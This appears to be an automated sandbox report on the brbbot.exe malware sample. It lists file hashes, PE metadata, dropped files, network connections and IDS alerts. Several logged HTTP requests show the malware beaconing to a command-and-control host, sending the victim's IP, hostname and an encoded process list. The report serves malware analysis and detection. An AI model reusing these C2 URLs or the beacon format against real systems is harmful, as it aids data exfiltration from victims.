| File name: | brbbot.exe |
| Full analysis: | https://app.any.run/tasks/dbad3115-b1e1-4fe0-9a7e-34bff26601f5 |
| Verdict: | Malicious activity |
| Analysis date: | November 01, 2024, 08:25:16 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (GUI) x86-64, for MS Windows, 6 sections |
| MD5: | 1C7243C8F3586B799A5F9A2E4200AA92 |
| SHA1: | 4DB5A8E237937B6D7B435A8506B8584121A7E9E3 |
| SHA256: | F47060D0F7DE5EE651878EB18DD2D24B5003BDB03EF4F49879F448F05034A21E |
| SSDEEP: | 1536:b6sMD3H8V3jsUnHLiREsTbDV/48OO4vh47483gLi9+LSGP:b6srVzJiRrTHVORe75g4+LSW |
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2015:02:25 06:12:18+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32+ |
| LinkerVersion: | 10 |
| CodeSize: | 50176 |
| InitializedDataSize: | 35328 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x3f94 |
| OSVersion: | 5.2 |
| ImageVersion: | - |
| SubsystemVersion: | 5.2 |
| Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 6608 | "C:\Users\admin\Desktop\brbbot.exe" | C:\Users\admin\Desktop\brbbot.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Modules
| |||||||||||||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6608 | brbbot.exe | C:\Users\admin\AppData\Roaming\brbbot.exe | executable | |
MD5:1C7243C8F3586B799A5F9A2E4200AA92 | SHA256:F47060D0F7DE5EE651878EB18DD2D24B5003BDB03EF4F49879F448F05034A21E | |||
| 6608 | brbbot.exe | C:\Users\admin\Desktop\brbconfig.tmp | binary | |
MD5:FEFC78962CFAEE3B2A9472B1357CE648 | SHA256:EE20EC1F9A574280270C0045CAA6EDA5B35B35D131E7A45DB7D0AFDAEF131E08 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
6944 | svchost.exe | GET | 200 | 2.16.164.49:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 1.01 Kb | whitelisted |
5488 | MoUsoCoreWorker.exe | GET | 200 | 2.16.164.49:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 1.01 Kb | whitelisted |
6608 | brbbot.exe | GET | 403 | 185.84.108.232:80 | http://brb.3dtuts.by/ads.php?i=192.168.100.126&c=DESKTOP-JGLLJLD&p=123f373e600822282f3e3660093e3c32282f29226028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60143d3d32383e18373238300f34092e35753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603f3a281334282f753e233e60282d383334282f753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60382f3d363435753e233e60282d383334282f753e233e603e232b3734293e29753e233e60282d383334282f753e233e60082f3a292f163e352e1e232b3e29323e35383e1334282f753e233e60092e352f32363e192934303e29753e233e60083e3a2938331a2b2b753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e600f3e232f12352b2e2f1334282f753e233e603f37373334282f753e233e60282d383334282f753e233e600822282f3e36083e2f2f32353c28753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600e283e291414191e192934303e29753e233e60282d383334282f753e233e6016340e28341834293e0c3429303e29753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e602e3328282d38753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e600c36320b292d081e753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e602e2b3d38753e233e60162e2815342f323d32383a2f323435753e233e600e28341837323e352f753e233e602f3a28303334282f2c753e233e603f3e3d3a2e372f763929342c283e29763a3c3e352f753e233e60282b2b282d38753e233e603d32293e3d3423753e233e603d32293e3d3423753e233e60282d383334282f753e233e6039293939342f753e233e | RU | html | 1.55 Kb | malicious |
5488 | MoUsoCoreWorker.exe | GET | 200 | 23.32.185.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | BR | binary | 973 b | whitelisted |
6944 | svchost.exe | GET | 200 | 23.32.185.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | BR | binary | 973 b | whitelisted |
6608 | brbbot.exe | GET | 403 | 185.84.108.232:80 | http://brb.3dtuts.by/ads.php?i=192.168.100.126&c=DESKTOP-JGLLJLD&p=123f373e600822282f3e3660093e3c32282f29226028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60143d3d32383e18373238300f34092e35753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603f3a281334282f753e233e60282d383334282f753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60382f3d363435753e233e60282d383334282f753e233e603e232b3734293e29753e233e60282d383334282f753e233e60082f3a292f163e352e1e232b3e29323e35383e1334282f753e233e60092e352f32363e192934303e29753e233e60083e3a2938331a2b2b753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e600f3e232f12352b2e2f1334282f753e233e603f37373334282f753e233e60282d383334282f753e233e600822282f3e36083e2f2f32353c28753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600e283e291414191e192934303e29753e233e60282d383334282f753e233e6016340e28341834293e0c3429303e29753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e602e3328282d38753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e600c36320b292d081e753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e602e2b3d38753e233e602f3a28303334282f2c753e233e60282b2b282d38753e233e60282d383334282f753e233e6039293939342f753e233e600c3a3a08163e3f32381a3c3e352f753e233e603834353334282f753e233e60282d383334282f753e233e | RU | html | 1.55 Kb | malicious |
6608 | brbbot.exe | GET | 403 | 185.84.108.232:80 | http://brb.3dtuts.by/ads.php?i=192.168.100.126&c=DESKTOP-JGLLJLD&p=123f373e600822282f3e3660093e3c32282f29226028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60143d3d32383e18373238300f34092e35753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60382f3d363435753e233e60282d383334282f753e233e603e232b3734293e29753e233e60282d383334282f753e233e60082f3a292f163e352e1e232b3e29323e35383e1334282f753e233e60092e352f32363e192934303e29753e233e60083e3a2938331a2b2b753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e600f3e232f12352b2e2f1334282f753e233e603f37373334282f753e233e60282d383334282f753e233e600822282f3e36083e2f2f32353c28753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600e283e291414191e192934303e29753e233e60282d383334282f753e233e6016340e28341834293e0c3429303e29753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e602e3328282d38753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e602e2b3d38753e233e60282d383334282f753e233e6039293939342f753e233e60282d383334282f753e233e | RU | html | 1.55 Kb | malicious |
6608 | brbbot.exe | GET | 403 | 185.84.108.232:80 | http://brb.3dtuts.by/ads.php?i=192.168.100.126&c=DESKTOP-JGLLJLD&p=123f373e600822282f3e3660093e3c32282f29226028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60143d3d32383e18373238300f34092e35753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60382f3d363435753e233e60282d383334282f753e233e603e232b3734293e29753e233e60282d383334282f753e233e60082f3a292f163e352e1e232b3e29323e35383e1334282f753e233e60092e352f32363e192934303e29753e233e60083e3a2938331a2b2b753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e600f3e232f12352b2e2f1334282f753e233e603f37373334282f753e233e60282d383334282f753e233e600822282f3e36083e2f2f32353c28753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600e283e291414191e192934303e29753e233e60282d383334282f753e233e6016340e28341834293e0c3429303e29753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e602e3328282d38753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e602e2b3d38753e233e60282d383334282f753e233e6039293939342f753e233e60282d383334282f753e233e | RU | html | 1.55 Kb | malicious |
6608 | brbbot.exe | GET | 403 | 185.84.108.232:80 | http://brb.3dtuts.by/ads.php?i=192.168.100.126&c=DESKTOP-JGLLJLD&p=123f373e600822282f3e3660093e3c32282f29226028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60143d3d32383e18373238300f34092e35753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603f3a281334282f753e233e60282d383334282f753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60382f3d363435753e233e60282d383334282f753e233e603e232b3734293e29753e233e60282d383334282f753e233e60082f3a292f163e352e1e232b3e29323e35383e1334282f753e233e60092e352f32363e192934303e29753e233e60083e3a2938331a2b2b753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e600f3e232f12352b2e2f1334282f753e233e603f37373334282f753e233e60282d383334282f753e233e600822282f3e36083e2f2f32353c28753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600e283e291414191e192934303e29753e233e60282d383334282f753e233e6016340e28341834293e0c3429303e29753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e602e3328282d38753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e600c36320b292d081e753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e602e2b3d38753e233e60282d383334282f753e233e6039293939342f753e233e60282d383334282f753e233e60282b2b282d38753e233e | RU | html | 1.55 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
6944 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
5488 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 2.23.209.158:443 | www.bing.com | Akamai International B.V. | GB | whitelisted |
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
6608 | brbbot.exe | 185.84.108.232:80 | brb.3dtuts.by | Hosting Ltd | RU | malicious |
6944 | svchost.exe | 2.16.164.49:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
5488 | MoUsoCoreWorker.exe | 2.16.164.49:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
6944 | svchost.exe | 23.32.185.131:80 | www.microsoft.com | AKAMAI-AS | BR | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
google.com |
| whitelisted |
brb.3dtuts.by |
| malicious |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
6608 | brbbot.exe | Misc activity | SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body |
6608 | brbbot.exe | Misc activity | SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body |